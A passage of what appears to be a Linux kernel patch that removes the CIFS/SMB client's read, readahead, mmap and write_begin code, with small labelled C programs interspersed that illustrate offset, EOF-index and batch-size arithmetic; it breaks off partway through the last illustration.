+-				mutex_unlock(&ctx->aio_mutex);
+-				return;
+-			}
+-
+-			if (rdata->result == -EAGAIN) {
+-				/* resend call if it's a retryable error */
+-				struct list_head tmp_list;
+-				unsigned int got_bytes = rdata->got_bytes;
+-
+-				list_del_init(&rdata->list);
+-				INIT_LIST_HEAD(&tmp_list);
+-
+-				/*
+-				 * Got a part of data and then reconnect has
+-				 * happened -- fill the buffer and continue
+-				 * reading.
+-				 */
+-				if (got_bytes && got_bytes < rdata->bytes) {
+-					rc = 0;
+-					if (!ctx->direct_io)
+-						rc = cifs_readdata_to_iov(rdata, to);
+-					if (rc) {
+-						kref_put(&rdata->refcount,
+-							cifs_uncached_readdata_release);
+-						continue;
+-					}
+-				}
+-
+-				if (ctx->direct_io) {
+-					/*
+-					 * Re-use rdata as this is a
+-					 * direct I/O
+-					 */
+-					rc = cifs_resend_rdata(
+-						rdata,
+-						&tmp_list, ctx);
+-				} else {
+-					rc = cifs_send_async_read(
+-						rdata->offset + got_bytes,
+-						rdata->bytes - got_bytes,
+-						rdata->cfile, cifs_sb,
+-						&tmp_list, ctx);
+-
+-					kref_put(&rdata->refcount,
+-						cifs_uncached_readdata_release);
+-				}
+-
+-				list_splice(&tmp_list, &ctx->list);
+-
+-				goto again;
+-			} else if (rdata->result)
+-				rc = rdata->result;
+-			else if (!ctx->direct_io)
+-				rc = cifs_readdata_to_iov(rdata, to);
+-
+-			/* if there was a short read -- discard anything left */
+-			if (rdata->got_bytes && rdata->got_bytes < rdata->bytes)
+-				rc = -ENODATA;
+-
+-			ctx->total_len += rdata->got_bytes;
+-		}
+-		list_del_init(&rdata->list);
+-		kref_put(&rdata->refcount, cifs_uncached_readdata_release);
+-	}
+-
+-	if (!ctx->direct_io)
+-		ctx->total_len = ctx->len - iov_iter_count(to);
+-
+-	/* mask nodata case */
+-	if (rc == -ENODATA)
+-		rc = 0;
+-
+-	ctx->rc = (rc == 0) ? (ssize_t)ctx->total_len : rc;
+-
+-	mutex_unlock(&ctx->aio_mutex);
+-
+-	if (ctx->iocb && ctx->iocb->ki_complete)
+-		ctx->iocb->ki_complete(ctx->iocb, ctx->rc);
+-	else
+-		complete(&ctx->done);
+-}
+-
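/*
 * Aside: not from this patch.  When a read comes back short with
 * -EAGAIN, the collector above consumes got_bytes and reissues only the
 * remainder, starting right after them.  The resume arithmetic, with
 * invented sample numbers:
 */
#include <stdio.h>

int main(void)
{
	unsigned long long offset = 65536;	/* original rdata->offset */
	unsigned int bytes = 32768;		/* original rdata->bytes  */
	unsigned int got_bytes = 12000;		/* delivered before reconnect */

	printf("resend at offset %llu for %u bytes\n",
	       offset + got_bytes, bytes - got_bytes);	/* 77536 for 20768 */
	return 0;
}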
+-static ssize_t __cifs_readv(
+-	struct kiocb *iocb, struct iov_iter *to, bool direct)
+-{
+-	size_t len;
+-	struct file *file = iocb->ki_filp;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifsFileInfo *cfile;
+-	struct cifs_tcon *tcon;
+-	ssize_t rc, total_read = 0;
+-	loff_t offset = iocb->ki_pos;
+-	struct cifs_aio_ctx *ctx;
+-
+-	/*
+-	 * iov_iter_get_pages_alloc() doesn't work with ITER_KVEC,
+-	 * so fall back to the data copy read path.
+-	 * This could be improved by getting pages directly in the
+-	 * ITER_KVEC case.
+-	 */
+-	if (direct && iov_iter_is_kvec(to)) {
+-		cifs_dbg(FYI, "use non-direct cifs_user_readv for kvec I/O\n");
+-		direct = false;
+-	}
+-
+-	len = iov_iter_count(to);
+-	if (!len)
+-		return 0;
+-
+-	cifs_sb = CIFS_FILE_SB(file);
+-	cfile = file->private_data;
+-	tcon = tlink_tcon(cfile->tlink);
+-
+-	if (!tcon->ses->server->ops->async_readv)
+-		return -ENOSYS;
+-
+-	if ((file->f_flags & O_ACCMODE) == O_WRONLY)
+-		cifs_dbg(FYI, "attempting read on write only file instance\n");
+-
+-	ctx = cifs_aio_ctx_alloc();
+-	if (!ctx)
+-		return -ENOMEM;
+-
+-	ctx->cfile = cifsFileInfo_get(cfile);
+-
+-	if (!is_sync_kiocb(iocb))
+-		ctx->iocb = iocb;
+-
+-	if (user_backed_iter(to))
+-		ctx->should_dirty = true;
+-
+-	if (direct) {
+-		ctx->pos = offset;
+-		ctx->direct_io = true;
+-		ctx->iter = *to;
+-		ctx->len = len;
+-	} else {
+-		rc = setup_aio_ctx_iter(ctx, to, ITER_DEST);
+-		if (rc) {
+-			kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-			return rc;
+-		}
+-		len = ctx->len;
+-	}
+-
+-	if (direct) {
+-		rc = filemap_write_and_wait_range(file->f_inode->i_mapping,
+-						  offset, offset + len - 1);
+-		if (rc) {
+-			kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-			return -EAGAIN;
+-		}
+-	}
+-
+-	/* grab a lock here because read response handlers can access ctx */
+-	mutex_lock(&ctx->aio_mutex);
+-
+-	rc = cifs_send_async_read(offset, len, cfile, cifs_sb, &ctx->list, ctx);
+-
+-	/* if at least one read request was sent successfully, reset rc */
+-	if (!list_empty(&ctx->list))
+-		rc = 0;
+-
+-	mutex_unlock(&ctx->aio_mutex);
+-
+-	if (rc) {
+-		kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-		return rc;
+-	}
+-
+-	if (!is_sync_kiocb(iocb)) {
+-		kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-		return -EIOCBQUEUED;
+-	}
+-
+-	rc = wait_for_completion_killable(&ctx->done);
+-	if (rc) {
+-		mutex_lock(&ctx->aio_mutex);
+-		ctx->rc = rc = -EINTR;
+-		total_read = ctx->total_len;
+-		mutex_unlock(&ctx->aio_mutex);
+-	} else {
+-		rc = ctx->rc;
+-		total_read = ctx->total_len;
+-	}
+-
+-	kref_put(&ctx->refcount, cifs_aio_ctx_release);
+-
+-	if (total_read) {
+-		iocb->ki_pos += total_read;
+-		return total_read;
+-	}
+-	return rc;
+-}
+-
+-ssize_t cifs_direct_readv(struct kiocb *iocb, struct iov_iter *to)
+-{
+-	return __cifs_readv(iocb, to, true);
+-}
+-
+-ssize_t cifs_user_readv(struct kiocb *iocb, struct iov_iter *to)
+-{
+-	return __cifs_readv(iocb, to, false);
+-}
+-
+-ssize_t
+-cifs_strict_readv(struct kiocb *iocb, struct iov_iter *to)
+-{
+-	struct inode *inode = file_inode(iocb->ki_filp);
+-	struct cifsInodeInfo *cinode = CIFS_I(inode);
+-	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
+-	struct cifsFileInfo *cfile = (struct cifsFileInfo *)
+-						iocb->ki_filp->private_data;
+-	struct cifs_tcon *tcon = tlink_tcon(cfile->tlink);
+-	int rc = -EACCES;
+-
+-	/*
+-	 * In strict cache mode we need to read from the server all the time
+-	 * if we don't have level II oplock because the server can delay mtime
+-	 * change - so we can't decide whether to invalidate the inode.
+-	 * We can also fail with page reading if there are mandatory locks
+-	 * on pages affected by this read but not on the region from pos to
+-	 * pos+len-1.
+-	 */
+-	if (!CIFS_CACHE_READ(cinode))
+-		return cifs_user_readv(iocb, to);
+-
+-	if (cap_unix(tcon->ses) &&
+-	    (CIFS_UNIX_FCNTL_CAP & le64_to_cpu(tcon->fsUnixInfo.Capability)) &&
+-	    ((cifs_sb->mnt_cifs_flags & CIFS_MOUNT_NOPOSIXBRL) == 0))
+-		return generic_file_read_iter(iocb, to);
+-
+-	/*
+-	 * We need to hold the sem to be sure nobody modifies lock list
+-	 * with a brlock that prevents reading.
+-	 */
+-	down_read(&cinode->lock_sem);
+-	if (!cifs_find_lock_conflict(cfile, iocb->ki_pos, iov_iter_count(to),
+-				     tcon->ses->server->vals->shared_lock_type,
+-				     0, NULL, CIFS_READ_OP))
+-		rc = generic_file_read_iter(iocb, to);
+-	up_read(&cinode->lock_sem);
+-	return rc;
+-}
+-
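/*
 * Aside: not from this patch.  The routing in cifs_strict_readv()
 * above boils down to three cases.  A boolean sketch with assumed flag
 * names (route_read is invented); the real checks live in the cinode,
 * tcon and superblock.
 */
#include <stdio.h>
#include <stdbool.h>

static const char *route_read(bool cache_read, bool posix_brlocks,
			      bool lock_conflict)
{
	if (!cache_read)
		return "uncached read from server";	/* cifs_user_readv */
	if (posix_brlocks)
		return "cached generic read";	/* generic_file_read_iter */
	return lock_conflict ? "-EACCES" : "cached generic read";
}

int main(void)
{
	printf("%s\n", route_read(false, false, false));
	printf("%s\n", route_read(true, true, false));
	printf("%s\n", route_read(true, false, true));
	return 0;
}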
+-static ssize_t
+-cifs_read(struct file *file, char *read_data, size_t read_size, loff_t *offset)
+-{
+-	int rc = -EACCES;
+-	unsigned int bytes_read = 0;
+-	unsigned int total_read;
+-	unsigned int current_read_size;
+-	unsigned int rsize;
+-	struct cifs_sb_info *cifs_sb;
+-	struct cifs_tcon *tcon;
+-	struct TCP_Server_Info *server;
+-	unsigned int xid;
+-	char *cur_offset;
+-	struct cifsFileInfo *open_file;
+-	struct cifs_io_parms io_parms = {0};
+-	int buf_type = CIFS_NO_BUFFER;
+-	__u32 pid;
+-
+-	xid = get_xid();
+-	cifs_sb = CIFS_FILE_SB(file);
+-
+-	/* FIXME: set up handlers for larger reads and/or convert to async */
+-	rsize = min_t(unsigned int, cifs_sb->ctx->rsize, CIFSMaxBufSize);
+-
+-	if (file->private_data == NULL) {
+-		rc = -EBADF;
+-		free_xid(xid);
+-		return rc;
+-	}
+-	open_file = file->private_data;
+-	tcon = tlink_tcon(open_file->tlink);
+-	server = cifs_pick_channel(tcon->ses);
+-
+-	if (!server->ops->sync_read) {
+-		free_xid(xid);
+-		return -ENOSYS;
+-	}
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		pid = open_file->pid;
+-	else
+-		pid = current->tgid;
+-
+-	if ((file->f_flags & O_ACCMODE) == O_WRONLY)
+-		cifs_dbg(FYI, "attempting read on write only file instance\n");
+-
+-	for (total_read = 0, cur_offset = read_data; read_size > total_read;
+-	     total_read += bytes_read, cur_offset += bytes_read) {
+-		do {
+-			current_read_size = min_t(uint, read_size - total_read,
+-						  rsize);
+-			/*
+-			 * For Windows ME and 9x we do not want to request more
+-			 * than was negotiated, since the server will refuse
+-			 * the read otherwise.
+-			 */
+-			if (!(tcon->ses->capabilities &
+-				tcon->ses->server->vals->cap_large_files)) {
+-				current_read_size = min_t(uint,
+-					current_read_size, CIFSMaxBufSize);
+-			}
+-			if (open_file->invalidHandle) {
+-				rc = cifs_reopen_file(open_file, true);
+-				if (rc != 0)
+-					break;
+-			}
+-			io_parms.pid = pid;
+-			io_parms.tcon = tcon;
+-			io_parms.offset = *offset;
+-			io_parms.length = current_read_size;
+-			io_parms.server = server;
+-			rc = server->ops->sync_read(xid, &open_file->fid, &io_parms,
+-						    &bytes_read, &cur_offset,
+-						    &buf_type);
+-		} while (rc == -EAGAIN);
+-
+-		if (rc || (bytes_read == 0)) {
+-			if (total_read) {
+-				break;
+-			} else {
+-				free_xid(xid);
+-				return rc;
+-			}
+-		} else {
+-			cifs_stats_bytes_read(tcon, total_read);
+-			*offset += bytes_read;
+-		}
+-	}
+-	free_xid(xid);
+-	return total_read;
+-}
+-
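/*
 * Aside: not from this patch.  cifs_read() above walks the request in
 * rsize-sized chunks, advancing the buffer pointer and file offset by
 * whatever each sync_read call returned.  A skeletal version of that
 * loop with a faked transport (fake_sync_read is invented):
 */
#include <stdio.h>

static unsigned int fake_sync_read(unsigned int want)
{
	return want > 4096 ? 4096 : want;	/* server caps each reply */
}

int main(void)
{
	unsigned int read_size = 10000, total_read = 0, rsize = 4096;

	while (read_size > total_read) {
		unsigned int want = read_size - total_read;
		unsigned int got = fake_sync_read(want < rsize ? want : rsize);

		if (!got)
			break;	/* EOF: stop and return what we have */
		total_read += got;
		printf("chunk of %u, total %u\n", got, total_read);
	}
	return 0;
}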
+-/*
+- * If the page is mmap'ed into a process' page tables, then we need to make
+- * sure that it doesn't change while being written back.
+- */
+-static vm_fault_t
+-cifs_page_mkwrite(struct vm_fault *vmf)
+-{
+-	struct page *page = vmf->page;
+-
+-	/* Wait for the page to be written to the cache before we allow it to
+-	 * be modified.  We then assume the entire page will need writing back.
+-	 */
+-#ifdef CONFIG_CIFS_FSCACHE
+-	if (PageFsCache(page) &&
+-	    wait_on_page_fscache_killable(page) < 0)
+-		return VM_FAULT_RETRY;
+-#endif
+-
+-	wait_on_page_writeback(page);
+-
+-	if (lock_page_killable(page) < 0)
+-		return VM_FAULT_RETRY;
+-	return VM_FAULT_LOCKED;
+-}
+-
+-static const struct vm_operations_struct cifs_file_vm_ops = {
+-	.fault = filemap_fault,
+-	.map_pages = filemap_map_pages,
+-	.page_mkwrite = cifs_page_mkwrite,
+-};
+-
+-int cifs_file_strict_mmap(struct file *file, struct vm_area_struct *vma)
+-{
+-	int xid, rc = 0;
+-	struct inode *inode = file_inode(file);
+-
+-	xid = get_xid();
+-
+-	if (!CIFS_CACHE_READ(CIFS_I(inode)))
+-		rc = cifs_zap_mapping(inode);
+-	if (!rc)
+-		rc = generic_file_mmap(file, vma);
+-	if (!rc)
+-		vma->vm_ops = &cifs_file_vm_ops;
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-int cifs_file_mmap(struct file *file, struct vm_area_struct *vma)
+-{
+-	int rc, xid;
+-
+-	xid = get_xid();
+-
+-	rc = cifs_revalidate_file(file);
+-	if (rc)
+-		cifs_dbg(FYI, "Validation prior to mmap failed, error=%d\n",
+-			 rc);
+-	if (!rc)
+-		rc = generic_file_mmap(file, vma);
+-	if (!rc)
+-		vma->vm_ops = &cifs_file_vm_ops;
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static void
+-cifs_readv_complete(struct work_struct *work)
+-{
+-	unsigned int i, got_bytes;
+-	struct cifs_readdata *rdata = container_of(work,
+-						struct cifs_readdata, work);
+-
+-	got_bytes = rdata->got_bytes;
+-	for (i = 0; i < rdata->nr_pages; i++) {
+-		struct page *page = rdata->pages[i];
+-
+-		if (rdata->result == 0 ||
+-		    (rdata->result == -EAGAIN && got_bytes)) {
+-			flush_dcache_page(page);
+-			SetPageUptodate(page);
+-		} else
+-			SetPageError(page);
+-
+-		if (rdata->result == 0 ||
+-		    (rdata->result == -EAGAIN && got_bytes))
+-			cifs_readpage_to_fscache(rdata->mapping->host, page);
+-
+-		unlock_page(page);
+-
+-		got_bytes -= min_t(unsigned int, PAGE_SIZE, got_bytes);
+-
+-		put_page(page);
+-		rdata->pages[i] = NULL;
+-	}
+-	kref_put(&rdata->refcount, cifs_readdata_release);
+-}
+-
+-static int
+-readpages_fill_pages(struct TCP_Server_Info *server,
+-		     struct cifs_readdata *rdata, struct iov_iter *iter,
+-		     unsigned int len)
+-{
+-	int result = 0;
+-	unsigned int i;
+-	u64 eof;
+-	pgoff_t eof_index;
+-	unsigned int nr_pages = rdata->nr_pages;
+-	unsigned int page_offset = rdata->page_offset;
+-
+-	/* determine the eof that the server (probably) has */
+-	eof = CIFS_I(rdata->mapping->host)->server_eof;
+-	eof_index = eof ? (eof - 1) >> PAGE_SHIFT : 0;
+-	cifs_dbg(FYI, "eof=%llu eof_index=%lu\n", eof, eof_index);
+-
+-	rdata->got_bytes = 0;
+-	rdata->tailsz = PAGE_SIZE;
+-	for (i = 0; i < nr_pages; i++) {
+-		struct page *page = rdata->pages[i];
+-		unsigned int to_read = rdata->pagesz;
+-		size_t n;
+-
+-		if (i == 0)
+-			to_read -= page_offset;
+-		else
+-			page_offset = 0;
+-
+-		n = to_read;
+-
+-		if (len >= to_read) {
+-			len -= to_read;
+-		} else if (len > 0) {
+-			/* enough for partial page, fill and zero the rest */
+-			zero_user(page, len + page_offset, to_read - len);
+-			n = rdata->tailsz = len;
+-			len = 0;
+-		} else if (page->index > eof_index) {
+-			/*
+-			 * The VFS will not try to do readahead past the
+-			 * i_size, but it's possible that we have outstanding
+-			 * writes with gaps in the middle and the i_size hasn't
+-			 * caught up yet. Populate those with zeroed out pages
+-			 * to prevent the VFS from repeatedly attempting to
+-			 * fill them until the writes are flushed.
+-			 */
+-			zero_user(page, 0, PAGE_SIZE);
+-			flush_dcache_page(page);
+-			SetPageUptodate(page);
+-			unlock_page(page);
+-			put_page(page);
+-			rdata->pages[i] = NULL;
+-			rdata->nr_pages--;
+-			continue;
+-		} else {
+-			/* no need to hold page hostage */
+-			unlock_page(page);
+-			put_page(page);
+-			rdata->pages[i] = NULL;
+-			rdata->nr_pages--;
+-			continue;
+-		}
+-
+-		if (iter)
+-			result = copy_page_from_iter(
+-					page, page_offset, n, iter);
+-#ifdef CONFIG_CIFS_SMB_DIRECT
+-		else if (rdata->mr)
+-			result = n;
+-#endif
+-		else
+-			result = cifs_read_page_from_socket(
+-					server, page, page_offset, n);
+-		if (result < 0)
+-			break;
+-
+-		rdata->got_bytes += result;
+-	}
+-
+-	return result != -ECONNABORTED && rdata->got_bytes > 0 ?
+-						rdata->got_bytes : result;
+-}
+-
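/*
 * Aside: not from this patch.  The fill loop above zero-fills pages
 * whose index lies past the page containing the server's last byte;
 * eof_index is the page index of byte eof - 1.  The page size and
 * sample EOFs below are assumed for illustration.
 */
#include <stdio.h>

#define PAGE_SHIFT 12	/* assume 4KiB pages */

int main(void)
{
	unsigned long long eofs[] = { 1, 4096, 4097, 8192 };
	unsigned int i;

	for (i = 0; i < sizeof(eofs) / sizeof(eofs[0]); i++) {
		unsigned long long eof = eofs[i];
		unsigned long eof_index = eof ? (eof - 1) >> PAGE_SHIFT : 0;

		/* 1 -> 0, 4096 -> 0, 4097 -> 1, 8192 -> 1 */
		printf("eof=%llu eof_index=%lu\n", eof, eof_index);
	}
	return 0;
}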
+-static int
+-cifs_readpages_read_into_pages(struct TCP_Server_Info *server,
+-			       struct cifs_readdata *rdata, unsigned int len)
+-{
+-	return readpages_fill_pages(server, rdata, NULL, len);
+-}
+-
+-static int
+-cifs_readpages_copy_into_pages(struct TCP_Server_Info *server,
+-			       struct cifs_readdata *rdata,
+-			       struct iov_iter *iter)
+-{
+-	return readpages_fill_pages(server, rdata, iter, iter->count);
+-}
+-
+-static void cifs_readahead(struct readahead_control *ractl)
+-{
+-	int rc;
+-	struct cifsFileInfo *open_file = ractl->file->private_data;
+-	struct cifs_sb_info *cifs_sb = CIFS_FILE_SB(ractl->file);
+-	struct TCP_Server_Info *server;
+-	pid_t pid;
+-	unsigned int xid, nr_pages, last_batch_size = 0, cache_nr_pages = 0;
+-	pgoff_t next_cached = ULONG_MAX;
+-	bool caching = fscache_cookie_enabled(cifs_inode_cookie(ractl->mapping->host)) &&
+-		cifs_inode_cookie(ractl->mapping->host)->cache_priv;
+-	bool check_cache = caching;
+-
+-	xid = get_xid();
+-
+-	if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_RWPIDFORWARD)
+-		pid = open_file->pid;
+-	else
+-		pid = current->tgid;
+-
+-	rc = 0;
+-	server = cifs_pick_channel(tlink_tcon(open_file->tlink)->ses);
+-
+-	cifs_dbg(FYI, "%s: file=%p mapping=%p num_pages=%u\n",
+-		 __func__, ractl->file, ractl->mapping, readahead_count(ractl));
+-
+-	/*
+-	 * Chop the readahead request up into rsize-sized read requests.
+-	 */
+-	while ((nr_pages = readahead_count(ractl) - last_batch_size)) {
+-		unsigned int i, got, rsize;
+-		struct page *page;
+-		struct cifs_readdata *rdata;
+-		struct cifs_credits credits_on_stack;
+-		struct cifs_credits *credits = &credits_on_stack;
+-		pgoff_t index = readahead_index(ractl) + last_batch_size;
+-
+-		/*
+-		 * Find out if we have anything cached in the range of
+-		 * interest, and if so, where the next chunk of cached data is.
+-		 */
+-		if (caching) {
+-			if (check_cache) {
+-				rc = cifs_fscache_query_occupancy(
+-					ractl->mapping->host, index, nr_pages,
+-					&next_cached, &cache_nr_pages);
+-				if (rc < 0)
+-					caching = false;
+-				check_cache = false;
+-			}
+-
+-			if (index == next_cached) {
+-				/*
+-				 * TODO: Send a whole batch of pages to be read
+-				 * by the cache.
+-				 */
+-				struct folio *folio = readahead_folio(ractl);
+-
+-				last_batch_size = folio_nr_pages(folio);
+-				if (cifs_readpage_from_fscache(ractl->mapping->host,
+-							       &folio->page) < 0) {
+-					/*
+-					 * TODO: Deal with cache read failure
+-					 * here, but for the moment, delegate
+-					 * that to readpage.
+-					 */
+-					caching = false;
+-				}
+-				folio_unlock(folio);
+-				next_cached++;
+-				cache_nr_pages--;
+-				if (cache_nr_pages == 0)
+-					check_cache = true;
+-				continue;
+-			}
+-		}
+-
+-		if (open_file->invalidHandle) {
+-			rc = cifs_reopen_file(open_file, true);
+-			if (rc) {
+-				if (rc == -EAGAIN)
+-					continue;
+-				break;
+-			}
+-		}
+-
+-		if (cifs_sb->ctx->rsize == 0)
+-			cifs_sb->ctx->rsize =
+-				server->ops->negotiate_rsize(tlink_tcon(open_file->tlink),
+-							     cifs_sb->ctx);
+-
+-		rc = server->ops->wait_mtu_credits(server, cifs_sb->ctx->rsize,
+-						   &rsize, credits);
+-		if (rc)
+-			break;
+-		nr_pages = min_t(size_t, rsize / PAGE_SIZE, readahead_count(ractl));
+-		nr_pages = min_t(size_t, nr_pages, next_cached - index);
+-
+-		/*
+-		 * Give up immediately if rsize is too small to read an entire
+-		 * page. The VFS will fall back to readpage. We should never
+-		 * reach this point however since we set ra_pages to 0 when the
+-		 * rsize is smaller than a cache page.
+-		 */
+-		if (unlikely(!nr_pages)) {
+-			add_credits_and_wake_if(server, credits, 0);
+-			break;
+-		}
+-
+-		rdata = cifs_readdata_alloc(nr_pages, cifs_readv_complete);
+-		if (!rdata) {
+-			/* best to give up if we're out of mem */
+-			add_credits_and_wake_if(server, credits, 0);
+-			break;
+-		}
+-
+-		got = __readahead_batch(ractl, rdata->pages, nr_pages);
+-		if (got != nr_pages) {
+-			pr_warn("__readahead_batch() returned %u/%u\n",
+-				got, nr_pages);
+-			nr_pages = got;
+-		}
+-
+-		rdata->nr_pages = nr_pages;
+-		rdata->bytes	= readahead_batch_length(ractl);
+-		rdata->cfile	= cifsFileInfo_get(open_file);
+-		rdata->server	= server;
+-		rdata->mapping	= ractl->mapping;
+-		rdata->offset	= readahead_pos(ractl);
+-		rdata->pid	= pid;
+-		rdata->pagesz	= PAGE_SIZE;
+-		rdata->tailsz	= PAGE_SIZE;
+-		rdata->read_into_pages = cifs_readpages_read_into_pages;
+-		rdata->copy_into_pages = cifs_readpages_copy_into_pages;
+-		rdata->credits	= credits_on_stack;
+-
+-		rc = adjust_credits(server, &rdata->credits, rdata->bytes);
+-		if (!rc) {
+-			if (rdata->cfile->invalidHandle)
+-				rc = -EAGAIN;
+-			else
+-				rc = server->ops->async_readv(rdata);
+-		}
+-
+-		if (rc) {
+-			add_credits_and_wake_if(server, &rdata->credits, 0);
+-			for (i = 0; i < rdata->nr_pages; i++) {
+-				page = rdata->pages[i];
+-				unlock_page(page);
+-				put_page(page);
+-			}
+-			/* Fall back to readpage in error/reconnect cases */
+-			kref_put(&rdata->refcount, cifs_readdata_release);
+-			break;
+-		}
+-
+-		kref_put(&rdata->refcount, cifs_readdata_release);
+-		last_batch_size = nr_pages;
+-	}
+-
+-	free_xid(xid);
+-}
+-
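/*
 * Aside: not from this patch.  Each trip around the loop in
 * cifs_readahead() above issues at most rsize bytes and never crosses
 * into the next range found in fscache.  The batch-size clamp, with
 * invented numbers:
 */
#include <stdio.h>

#define PAGE_SIZE 4096UL

static size_t min_sz(size_t a, size_t b) { return a < b ? a : b; }

int main(void)
{
	size_t rsize = 65536;		/* negotiated read size */
	size_t ra_count = 64;		/* pages left in the readahead window */
	size_t index = 100, next_cached = 120;	/* next page held by fscache */
	size_t nr_pages;

	nr_pages = min_sz(rsize / PAGE_SIZE, ra_count);
	nr_pages = min_sz(nr_pages, next_cached - index);

	printf("batch of %zu pages\n", nr_pages);	/* min(16, 64, 20) = 16 */
	return 0;
}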
+-/*
+- * cifs_readpage_worker must be called with the page pinned
+- */
+-static int cifs_readpage_worker(struct file *file, struct page *page,
+-	loff_t *poffset)
+-{
+-	char *read_data;
+-	int rc;
+-
+-	/* Is the page cached? */
+-	rc = cifs_readpage_from_fscache(file_inode(file), page);
+-	if (rc == 0)
+-		goto read_complete;
+-
+-	read_data = kmap(page);
+-	/* for reads over a certain size we could initiate async readahead */
+-
+-	rc = cifs_read(file, read_data, PAGE_SIZE, poffset);
+-
+-	if (rc < 0)
+-		goto io_error;
+-	else
+-		cifs_dbg(FYI, "Bytes read %d\n", rc);
+-
+-	/* we do not want atime to be less than mtime; it broke some apps */
+-	file_inode(file)->i_atime = current_time(file_inode(file));
+-	if (timespec64_compare(&(file_inode(file)->i_atime), &(file_inode(file)->i_mtime)))
+-		file_inode(file)->i_atime = file_inode(file)->i_mtime;
+-	else
+-		file_inode(file)->i_atime = current_time(file_inode(file));
+-
+-	if (PAGE_SIZE > rc)
+-		memset(read_data + rc, 0, PAGE_SIZE - rc);
+-
+-	flush_dcache_page(page);
+-	SetPageUptodate(page);
+-
+-	/* send this page to the cache */
+-	cifs_readpage_to_fscache(file_inode(file), page);
+-
+-	rc = 0;
+-
+-io_error:
+-	kunmap(page);
+-	unlock_page(page);
+-
+-read_complete:
+-	return rc;
+-}
+-
+-static int cifs_read_folio(struct file *file, struct folio *folio)
+-{
+-	struct page *page = &folio->page;
+-	loff_t offset = page_file_offset(page);
+-	int rc = -EACCES;
+-	unsigned int xid;
+-
+-	xid = get_xid();
+-
+-	if (file->private_data == NULL) {
+-		rc = -EBADF;
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	cifs_dbg(FYI, "read_folio %p at offset %d 0x%x\n",
+-		 page, (int)offset, (int)offset);
+-
+-	rc = cifs_readpage_worker(file, page, &offset);
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static int is_inode_writable(struct cifsInodeInfo *cifs_inode)
+-{
+-	struct cifsFileInfo *open_file;
+-
+-	spin_lock(&cifs_inode->open_file_lock);
+-	list_for_each_entry(open_file, &cifs_inode->openFileList, flist) {
+-		if (OPEN_FMODE(open_file->f_flags) & FMODE_WRITE) {
+-			spin_unlock(&cifs_inode->open_file_lock);
+-			return 1;
+-		}
+-	}
+-	spin_unlock(&cifs_inode->open_file_lock);
+-	return 0;
+-}
+-
+-/* We do not want to update the file size from the server for inodes
+-   open for write, to avoid races with writepage extending the file.
+-   In the future we could consider allowing the inode to be refreshed
+-   only on increases in the file size, but this is tricky to do
+-   without racing with writebehind page caching in the current
+-   Linux kernel design. */
+-bool is_size_safe_to_change(struct cifsInodeInfo *cifsInode, __u64 end_of_file)
+-{
+-	if (!cifsInode)
+-		return true;
+-
+-	if (is_inode_writable(cifsInode)) {
+-		/* This inode is open for write at least once */
+-		struct cifs_sb_info *cifs_sb;
+-
+-		cifs_sb = CIFS_SB(cifsInode->netfs.inode.i_sb);
+-		if (cifs_sb->mnt_cifs_flags & CIFS_MOUNT_DIRECT_IO) {
+-			/* since there is no page cache to corrupt on
+-			   direct I/O, we can change the size safely */
+-			return true;
+-		}
+-
+-		if (i_size_read(&cifsInode->netfs.inode) < end_of_file)
+-			return true;
+-
+-		return false;
+-	} else
+-		return true;
+-}
+-
+-static int cifs_write_begin(struct file *file, struct address_space *mapping,
+-			loff_t pos, unsigned len,
+-			struct page **pagep, void **fsdata)
+-{
+-	int oncethru = 0;
+-	pgoff_t index = pos >> PAGE_SHIFT;
+-	loff_t offset = pos & (PAGE_SIZE - 1);
+-	loff_t page_start = pos & PAGE_MASK;
+-	loff_t i_size;
+-	struct page *page;
+-	int rc = 0;
+-
+-	cifs_dbg(FYI, "write_begin from %lld len %d\n", (long long)pos, len);
+-
+-start:
+-	page = grab_cache_page_write_begin(mapping, index);
+-	if (!page) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	if (PageUptodate(page))
+-		goto out;
+-
+-	/*
+-	 * If we write a full page it will be up to date, no need to read from
+-	 * the server. If the write is short, we'll end up doing a sync write
+-	 * instead.
+-	 */
+-	if (len == PAGE_SIZE)
+-		goto out;
+-
+-	/*
+-	 * optimize away the read when we have an oplock, and we're not
+-	 * expecting to use any of the data we'd be reading in. That
+-	 * is, when the page lies beyond the EOF, or straddles the EOF
+-	 * and the write will cover all of the existing data.
+-	 */
+-	if (CIFS_CACHE_READ(CIFS_I(mapping->host))) {
+-		i_size = i_size_read(mapping->host);
+-		if (page_start >= i_size ||
+-		    (offset == 0 && (pos + len) >= i_size)) {
+-			zero_user_segments(page, 0, offset,
+-					   offset + len,
+-					   PAGE_SIZE);
+-			/*
+-			 * PageChecked means that the parts of the page
+-			 * to which we're not writing are considered up
+-			 * to date. Once the data is copied to the
+-			 * page, it can be set uptodate.
+-			 */
+-			SetPageChecked(page);
+-			goto out;
+-		}
+-	}
+-
+-	if ((file->f_flags & O_ACCMODE) != O_WRONLY && !oncethru) {
+-		/*
+-		 * might as well read a page, it is fast enough. If we get
+-		 * an error, we don't need to return it. cifs_write_end will
+-		 * do a sync write instead since PG_uptodate isn't set.
+-		 */
+-		cifs_readpage_worker(file, page, &page_start);
+-		put_page(page);
+-		oncethru = 1;
+-		goto start;
+-	} else {
+-		/* we could try using another file handle if there is one -
+-		   but how would we lock it to prevent close of that handle
+-		   racing with this read? In any case this will be
+-		   written out by write_end, so it is fine */
+-	}
+-out:
+-	*pagep = page;
+-	return rc;
+-}
+-
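/*
 * Aside: not from this patch.  cifs_write_begin() above can skip the
 * read-modify-write fetch in two situations.  A predicate sketch of
 * those conditions; can_skip_read and the sample values are invented,
 * and the second case additionally requires a read oplock in the real
 * code.
 */
#include <stdio.h>
#include <stdbool.h>

#define PAGE_SIZE 4096L

static bool can_skip_read(long long pos, unsigned int len, long long i_size)
{
	long long page_start = pos & ~(PAGE_SIZE - 1);
	long long offset = pos & (PAGE_SIZE - 1);

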